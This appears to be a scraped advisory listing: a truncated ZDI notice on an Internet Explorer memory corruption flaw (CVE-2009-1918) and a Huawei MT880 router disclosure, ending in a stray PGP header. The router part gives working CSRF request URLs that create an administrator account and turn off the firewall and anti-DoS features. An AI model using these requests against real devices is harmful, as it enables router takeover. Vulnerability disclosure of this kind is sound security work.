ZDI-09-047: Microsoft Internet Explorer getElementsByTagName Memory
Corruption Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-047
August 5, 2009

-- CVE ID:
CVE-2009-1918

-- Affected Vendors:
Microsoft

-- Affected Products:
Microsoft Internet Explorer

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 8360.
For further product information on the TippingPoint IPS, visit:

   http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Microsoft Internet Explorer. User
interaction is required to exploit this vulnerabi ... Read more »

Description:
Huawei MT880 is a device offered by the algerian telecom operator - FAWRI, to provide ADSL Internet connexion and it's already widely in use.
Overview:
Huawei MT880 firmware and its default configuration has flaws, which allows LAN users to gain unauthorized full access to device.

Here are just limited PoCs.
Possible XSRFs:

Adding an administrator user:
http://192.168.1.1/Action?user_id=jerome&priv=1&pass1=jerome&pass2=jerome&id=70

Disabling firewall/anti-DoS... features:
http://192.168.1.1/Action?blacklisting_status=1&bl_list=10&attack_status=0&dos_status=0&id=42 ... Read more »

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 ______________________________